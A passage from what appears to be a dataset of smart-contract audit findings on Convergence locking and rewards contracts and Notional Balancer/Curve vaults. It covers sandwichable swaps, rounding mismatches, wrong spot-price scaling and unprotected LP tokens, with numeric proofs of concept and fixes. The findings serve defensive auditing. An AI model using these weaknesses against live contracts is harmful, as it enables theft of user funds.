```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, "INVALID_PERCENTAGE");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, "TOO_MUCH_DELEGATEES");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, "TOO_MUCH_MG_TOKEN_ID_DELEGATED");\\n```\\n
cvgControlTower and veCVG lock timing will be different and lead to yield loss scenarios
medium
When creating a locked CVG position, there are two more or less independent locks that are created. The first is in lockingPositionService and the other is in veCVG. LockingPositionService operates on cycles (which are not finite length) while veCVG always rounds down to the absolute nearest week. The disparity between these two accounting mechanism leads to conflicting scenario that the lock on LockingPositionService can be expired while the lock on veCVG isn't (and vice versa). Additionally tokens with expired locks on LockingPositionService cannot be extended. The result is that the token is expired but can't be withdrawn. The result of this is that the expired token must wait to be unstaked and then restaked, cause loss of user yield and voting power while the token is DOS'd.\\nCycles operate using block.timestamp when setting lastUpdateTime on the new cycle in L345. It also requires that at least 7 days has passed since this update to roll the cycle forward in L205. The result is that the cycle can never be exactly 7 days long and the start/end of the cycle will constantly fluctuate.\\nMeanwhile when veCVG is calculating the unlock time it uses the week rounded down as shown in L328.\\nWe can demonstrate with an example:\\nAssume the first CVG cycle is started at block.timestamp == 1,000,000. This means our first cycle ends at 1,604,800. A user deposits for a single cycle at 1,400,000. A lock is created for cycle 2 which will unlock at 2,209,600.\\nThe lock on veCVG does not match this though. Instead it's calculation will yield:\\n```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n\\nAs seen these are mismatched and the token won't be withdrawable until much after it should be due to the check in veCVG L404.\\nThis DOS will prevent the expired lock from being unstaked and restaked which causes loss of yield.\\nThe opposite issue can also occur. For each cycle that is slightly longer than expected the veCVG lock will become further and further behind the cycle lock on lockingPositionService. This can also cause a dos and yield loss because it could prevent user from extending valid locks due to the checks in L367 of veCVG.\\nAn example of this:\\nAssume a user locks for 96 weeks (58,060,800). Over the course of that year, it takes an average of 2 hours between the end of each cycle and when the cycle is rolled over. This effectively extends our cycle time from 604,800 to 612,000 (+7200). Now after 95 cycles, the user attempts to increase their lock duration. veCVG and lockingPositionService will now be completely out of sync:\\nAfter 95 cycles the current time would be:\\n```\\n612,000 * 95 = 58,140,000\\n```\\n\\nWhereas veCVG lock ended:\\n```\\n612,000 * 96 = 58,060,800\\n```\\n\\nAccording to veCVG the position was unlocked at 58,060,800 and therefore increasing the lock time will revert due to L367\\nThe result is another DOS that will cause the user loss of yield. During this time the user would also be excluded from taking place in any votes since their veCVG lock is expired.
I would recommend against using block.timestamp for CVG cycles, instead using an absolute measurement like veCVG uses.
Unlock DOS that cause loss of yield to the user
```\\n(1,400,000 + 2 * 604,800) / 604,800 = 4\\n\\n4 * 604,800 = 2,419,200\\n```\\n
SdtRewardReceiver#_withdrawRewards has incorrect slippage protection and withdraws can be sandwiched
medium
The _min_dy parameter of poolCvgSDT.exchange is set via the poolCvgSDT.get_dy method. The problem with this is that get_dy is a relative output that is executed at runtime. This means that no matter the state of the pool, this slippage check will never work.\\nSdtRewardReceiver.sol#L229-L236\\n```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n\\nWhen swapping from SDT to cvgSDT, get_dy is used to set _min_dy inside exchange. The issue is that get_dy is the CURRENT amount that would be received when swapping as shown below:\\n```\\n@view\\n@external\\ndef get_dy(i: int128, j: int128, dx: uint256) -> uint256:\\n """\\n @notice Calculate the current output dy given input dx\\n @dev Index values can be found via the `coins` public getter method\\n @param i Index value for the coin to send\\n @param j Index valie of the coin to recieve\\n @param dx Amount of `i` being exchanged\\n @return Amount of `j` predicted\\n """\\n rates: uint256[N_COINS] = self.rate_multipliers\\n xp: uint256[N_COINS] = self._xp_mem(rates, self.balances)\\n\\n x: uint256 = xp[i] + (dx * rates[i] / PRECISION)\\n y: uint256 = self.get_y(i, j, x, xp, 0, 0)\\n dy: uint256 = xp[j] - y - 1\\n fee: uint256 = self.fee * dy / FEE_DENOMINATOR\\n return (dy - fee) * PRECISION / rates[j]\\n```\\n\\nThe return value is EXACTLY the result of a regular swap, which is where the problem is. There is no way that the exchange call can ever revert. Assume the user is swapping because the current exchange ratio is 1:1.5. Now assume their withdraw is sandwich attacked. The ratio is change to 1:0.5 which is much lower than expected. When get_dy is called it will simulate the swap and return a ratio of 1:0.5. This in turn doesn't protect the user at all and their swap will execute at the poor price.
Allow the user to set _min_dy directly so they can guarantee they get the amount they want
SDT rewards will be sandwiched and can lose the entire balance
```\\n if (isMint) {\\n /// @dev Mint cvgSdt 1:1 via CvgToke contract\\n cvgSdt.mint(receiver, rewardAmount);\\n } else {\\n ICrvPoolPlain _poolCvgSDT = poolCvgSDT;\\n /// @dev Only swap if the returned amount in CvgSdt is gretear than the amount rewarded in SDT\\n _poolCvgSDT.exchange(0, 1, rewardAmount, _poolCvgSDT.get_dy(0, 1, rewardAmount), receiver);\\n }\\n```\\n
Division difference can result in a revert when claiming treasury yield and excess rewards to some users
medium
Different ordering of calculations are used to compute `ysTotal` in different situations. This causes the totalShares tracked to be less than the claimable amount of shares\\n`ysTotal` is calculated differently when adding to `totalSuppliesTracking` and when computing `balanceOfYsCvgAt`. When adding to `totalSuppliesTracking`, the calculation of `ysTotal` is as follows:\\n```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n\\nIn `balanceOfYsCvgAt`, `ysTotal` is calculated as follows\\n```\\n uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n\\nThis difference allows the `balanceOfYsCvgAt` to be greater than what is added to `totalSuppliesTracking`\\nPOC\\n```\\n startCycle 357\\n endCycle 420\\n lockDuration 63\\n amount 2\\n ysPercentage 80\\n```\\n\\nCalculation in `totalSuppliesTracking` gives:\\n```\\n uint256 cvgLockAmount = (2 * 80) / 100; == 1\\n uint256 ysTotal = (63 * 1) / 96; == 0\\n```\\n\\nCalculation in `balanceOfYsCvgAt` gives:\\n```\\n uint256 ysTotal = ((63 * 2 * 80) / 100) / 96; == 10080 / 100 / 96 == 1\\n```\\n\\nExample Scenario\\nAlice, Bob and Jake locks cvg for 1 TDE and obtains rounded up `balanceOfYsCvgAt`. A user who is aware of this issue can exploit this issue further by using `increaseLockAmount` with small amount values by which the total difference difference b/w the user's calculated `balanceOfYsCvgAt` and the accounted amount in `totalSuppliesTracking` can be increased. Bob and Jake claims the reward at the end of reward cycle. When Alice attempts to claim rewards, it reverts since there is not enough reward to be sent.
Perform the same calculation in both places\\n```\\n+++ uint256 _ysTotal = (_extension.endCycle - _extension.cycleId)* ((_extension.cvgLocked * _lockingPosition.ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n--- uint256 ysTotal = (((endCycle - startCycle) * amount * ysPercentage) / MAX_PERCENTAGE) / MAX_LOCK;\\n```\\n
This breaks the shares accounting of the treasury rewards. Some user's will get more than the actual intended rewards while the last withdrawals will result in a revert
```\\n uint256 cvgLockAmount = (amount * ysPercentage) / MAX_PERCENTAGE;\\n uint256 ysTotal = (lockDuration * cvgLockAmount) / MAX_LOCK;\\n```\\n
Different spot prices used during the comparison
high
The spot prices used during the comparison are different, which might result in the trade proceeding even if the pool is manipulated, leading to a loss of assets.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nLine 91 above calls the `SPOT_PRICE.getComposableSpotPrices` function to fetch the spot prices. Within the function, it relies on the `StableMath._calcSpotPrice` function to compute the spot price. Per the comments of this function, `spot price of token Y in token X` and `spot price Y/X` means that the Y (base) / X (quote). Thus, secondary (base) / primary (quote).\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n```\\n\\nThe above spot price will be used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\n
Consider verifying if the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation with the Balancer team.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.
If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n
BPT LP Token could be sold off during re-investment
medium
BPT LP Token could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for LP Token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens does not consists of the BPT token. Thus, it needs to be explicitly defined within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n
Ensure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n
LP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault
```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Fewer than expected LP tokens if the pool is imbalanced during vault restoration
high
The vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss for the vault shareholder.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of proportional join to minimize slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed, the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed\\nAt T2, certain events happen or due to ongoing issues with the pool (e.g., attacks, bugs, mass withdrawal), the pool becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplantation of imbalance pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.
Consider providing the callers the option to deposit the reward tokens in a "non-proportional" manner if a pool becomes imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens in external DEXs within the `restoreVault` function to achieve the most optimal proportion to minimize the penalty and slippage when re-entering the pool. This is similar to the approach in the vault's reinvest function.
There is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the deposit resulting in fewer LP tokens than possible due to the deposit penalty or slippage due to internal swap.\\nThe side-effect is that the vault restoration will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of assets for the vault shareholder.
```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n
Rounding differences when computing the invariant
high
The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Balancer's Composable Pool codebase relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the `StableMath._calculateInvariant` is computed rounding up per Line 90 below\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. Following is the StableMath.sol of one of the popular composable pools in Arbitrum that uses the new StableMath library\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in a different invariant
To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.
The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.
```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n
Incorrect scaling of the spot price
high
The incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nWithin the `getComposableSpotPrices` function, it will trigger the `_calculateStableMathSpotPrice` function. When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssuming that the following states:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe `spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 